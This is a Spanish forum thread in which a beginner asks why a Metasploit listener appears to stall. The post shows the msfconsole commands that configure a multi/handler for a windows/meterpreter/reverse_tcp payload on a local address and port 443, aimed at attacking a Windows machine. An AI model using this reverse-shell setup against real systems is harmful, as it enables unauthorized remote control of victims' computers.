elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: ¿Usas Skype? Protégete de los Skype Resolver


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, toxeek)
| | | |-+  Porque termina el proceso de escucha en metasploit?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Porque termina el proceso de escucha en metasploit?  (Leído 167 veces)
j0x1_zurc

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Porque termina el proceso de escucha en metasploit?
« en: 1 Septiembre 2017, 04:51 »

El problema es que cuando termino de configurar la consola de metasploit para hacer un ataque en windows, termina el proceso de escuccha, y queda algo como esto:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.3      yes       The listen address
   LPORT     443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit
  • Exploit running as background job.
  • Started reverse TCP handler on 192.168.1.3:443
msf exploit(handler) >


y hasta alli queda, no se si tengo algo malo, y me puedan corregir?
tambien,anteriormente, no funcionaba el payload cuando se abria el programa en windows, se quedaba atascado en esto:
msf exploit(handler) > exploit
  • Exploit running as background job.
  • Started reverse TCP handler on 192.168.1.3:443

PD: Soy nuevo en esto.


· Los temas van en su respectivo subforo
>aquí las reglas del foro
-Engel Lex
« Última modificación: 1 Septiembre 2017, 05:20 por engel lex » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines